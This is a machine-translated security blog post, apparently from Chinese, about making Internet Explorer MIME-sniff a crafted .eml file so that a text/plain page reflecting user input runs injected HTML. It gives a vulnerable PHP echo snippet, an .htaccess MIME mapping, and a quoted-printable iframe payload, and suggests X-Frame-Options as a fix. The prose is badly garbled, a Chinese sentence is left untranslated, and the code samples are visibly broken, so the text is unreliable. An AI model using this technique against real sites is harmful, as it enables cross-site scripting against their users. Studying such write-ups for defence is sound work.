We believe that this loophole one day in the future will certainly give you great help. Note that this vulnerability will affect all versions of IE in Win7, And Win8. 1 and Win10 on a test, but MicrosoftEdge not affected by this vulnerability. ! Vulnerability overview The server sends the response information, the data packet usually contains a variety of headers. One of these is Content-Type, this header is responsible for telling the browser returns the information of the multimedia type of the MediaType in. If you want to know more about the Content-Type of the content, please refer to the MDN of this article【portal】。 In the penetration testing process, we often encounter some missing input validation or output encoding of the page, but this also means that we foundXSSvulnerabilities? In fact...because the Content-Type it is possible to return“text/plain”, and according to the specification document【reference material 1】【Reference material 2】【Reference material 3】definition, when the Content-Type of the returned value is“text/plain”, the browser will enter the code processing mode, and code mode for the attacker is of little value. For example, please see the following examples plain.php to: header("Content-Type: text/plain"); echo "Hello: ".$ _GET["name"]; ?& gt; As you can see, this is a very simple example, it receives only one parameter, the first row indicates that the server return the Content-Type should be“text/plain”for. Next, let's look at a look at is able to inject some harmless HTML code. ! Sure enough, we managed to achieve the injection, but the browser did not execute the injected code. The reason is simple, because the response type is“text/plain” for. Vulnerability analysis Through the study found that if you open a. eml file, then the IE browser will perform mime-sniffing, if in response to the information identifying to the HTML/JS file, the browser will execute these code. First of all, EML on behalf of“the Microsoft Outlook Express mail message”, which is the Microsoft Outlook e-mail messages, this format allows us to mail information stored in the file. If you for this format are interested, you can refer to this RFC document【portal】。 Given below is a. eml file samples that you can use to test: root@kali:/var/www/html# cat testeml_1. eml TESTEML Content-Type: text/html Content-Transfer-Encoding: quoted-printable
You can save the file in theWeb server, and through the IE browser to access it, Please note that the code at the bottom there are two empty rows. You will see the browser showing the correct content. Please note that the code in the“Content-Transfer-Encoding:quoted-printable”, we are in URL-encoded when using the=sign instead of percent number of percent. ! Test failed? It does not matter! This is because the Content-Type Error. For. the eml file, the correct Content-Type should be“message/rfc822”in. You can use the following. htaccess file: root@kali:/var/www/html# cat . htaccess AddType message/rfc822 . eml As a result, the browser returns the Content-Type is no problem. ! Exploit Next we use the previously given sample file, 我们需要攻击的仍然是plain.php the. In order to achieve the attack, we need to testeml_1. eml file to be modified. The Payload is as follows: iframe src=’plain. php? name=>h1>itworksh1>’>iframe> In the Payload is encoded after the results are as follows: =3Ciframe=20src=3D=27plain. php=3Fname=3D=3CHTML=3E=3Ch1=3Eit=20works=3C=2Fh1=3E=27=3E=3C=2Fiframe=3E The final testeml_1. eml files are as follows: root@kali:/var/www/html# cat testeml_1. eml TESTEML Content-Type: text/html Content-Transfer-Encoding: quoted-printable
=3Ciframe=20src=3D=27plain. php=3Fname=3D=3CHTML=3E=3Ch1=3Eit=20works=3C=2Fh1=3E=27=3E=3C=2Fiframe=3E Next, through the IE browser to access this file, the results as shown below: ! As shown above, we successfully exploited this vulnerability. Although we use the Content-Type is still“text/plain”, but we can force IE to perform mime-sniffing and execute our Payload is. Solutions The most simple solution is in the sample file, add the headers the‘X-Frame-Options:DENY’you can prevent this vulnerability being exploited. Note that setting the headers the‘X-Content-Type-Options:nosniff’, are not able to prevent such attacks.